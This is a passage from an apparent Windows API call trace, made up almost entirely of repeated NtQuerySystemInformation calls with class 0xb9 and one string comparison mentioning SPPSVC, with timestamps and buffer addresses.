(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x28, ResultLength=0x0) [0227.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd230, Length=0x38, ResultLength=0x0) [0227.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0b0, Length=0x20, ResultLength=0x0) [0227.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x20, ResultLength=0x0) [0227.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x20, ResultLength=0x0) [0227.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x20, ResultLength=0x0) [0227.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd230, Length=0x38, ResultLength=0x0) [0227.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0b0, Length=0x20, ResultLength=0x0) [0227.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x20, ResultLength=0x0) [0227.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x20, ResultLength=0x0) [0227.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd310, Length=0x58, ResultLength=0x0) [0227.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x38, ResultLength=0x0) [0227.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x28, ResultLength=0x0) [0227.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x28, ResultLength=0x0) [0227.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x28, ResultLength=0x0) [0227.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x28, ResultLength=0x0) [0227.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0a0, Length=0x28, ResultLength=0x0) [0227.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x38, ResultLength=0x0) [0227.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x38, ResultLength=0x0) [0227.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x28, ResultLength=0x0) [0227.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x28, ResultLength=0x0) [0227.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x38, ResultLength=0x0) [0227.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x38, ResultLength=0x0) [0227.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf90, Length=0x20, ResultLength=0x0) [0227.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf10, Length=0x20, ResultLength=0x0) [0227.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf10, Length=0x20, ResultLength=0x0) [0227.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf10, Length=0x20, ResultLength=0x0) [0227.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x20, ResultLength=0x0) [0227.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x38, ResultLength=0x0) [0227.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x20, ResultLength=0x0) [0227.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd000, Length=0x20, ResultLength=0x0) [0227.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd000, Length=0x20, ResultLength=0x0) [0227.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd000, Length=0x20, ResultLength=0x0) [0227.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x38, ResultLength=0x0) [0227.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x20, ResultLength=0x0) [0227.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd000, Length=0x20, ResultLength=0x0) [0227.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd000, Length=0x20, ResultLength=0x0) [0227.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd000, Length=0x20, ResultLength=0x0) [0227.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x38, ResultLength=0x0) [0227.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x20, ResultLength=0x0) [0227.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd010, Length=0x20, ResultLength=0x0) [0227.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd010, Length=0x20, ResultLength=0x0) [0227.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x50, ResultLength=0x0) [0227.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4a0, Length=0x38, ResultLength=0x0) [0227.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2d0, Length=0x28, ResultLength=0x0) [0227.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2d0, Length=0x28, ResultLength=0x0) [0227.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2d0, Length=0x28, ResultLength=0x0) [0227.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2d0, Length=0x28, ResultLength=0x0) [0227.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd340, Length=0x28, ResultLength=0x0) [0227.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4a0, Length=0x38, ResultLength=0x0) [0227.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3c0, Length=0x28, ResultLength=0x0) [0227.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3c0, Length=0x28, ResultLength=0x0) [0227.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4a0, Length=0x38, ResultLength=0x0) [0227.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd320, Length=0x20, ResultLength=0x0) [0227.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2a0, Length=0x20, ResultLength=0x0) [0227.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2a0, Length=0x20, ResultLength=0x0) [0227.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2a0, Length=0x20, ResultLength=0x0) [0227.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4a0, Length=0x38, ResultLength=0x0) [0227.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd320, Length=0x20, ResultLength=0x0) [0227.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2b0, Length=0x20, ResultLength=0x0) [0227.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2b0, Length=0x20, ResultLength=0x0) [0227.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd420, Length=0x50, ResultLength=0x0) [0227.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd350, Length=0x38, ResultLength=0x0) [0227.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd180, Length=0x28, ResultLength=0x0) [0227.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd180, Length=0x28, ResultLength=0x0) [0227.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd180, Length=0x28, ResultLength=0x0) [0227.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd180, Length=0x28, ResultLength=0x0) [0227.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x28, ResultLength=0x0) [0227.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd350, Length=0x38, ResultLength=0x0) [0227.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd270, Length=0x28, ResultLength=0x0) [0227.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd270, Length=0x28, ResultLength=0x0) [0227.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd350, Length=0x38, ResultLength=0x0) [0227.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1d0, Length=0x20, ResultLength=0x0) [0227.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x20, ResultLength=0x0) [0227.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x20, ResultLength=0x0) [0227.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x20, ResultLength=0x0) [0227.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd350, Length=0x38, ResultLength=0x0) [0227.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1d0, Length=0x20, ResultLength=0x0) [0227.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x20, ResultLength=0x0) [0227.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x20, ResultLength=0x0) [0227.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.796] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0227.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd408, Length=0x50, ResultLength=0x0) [0227.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd330, Length=0x38, ResultLength=0x0) [0227.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x28, ResultLength=0x0) [0227.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x28, ResultLength=0x0) [0227.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x28, ResultLength=0x0) [0227.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.799] NtQuerySystemInformation (SystemInformationClass=0xb9, 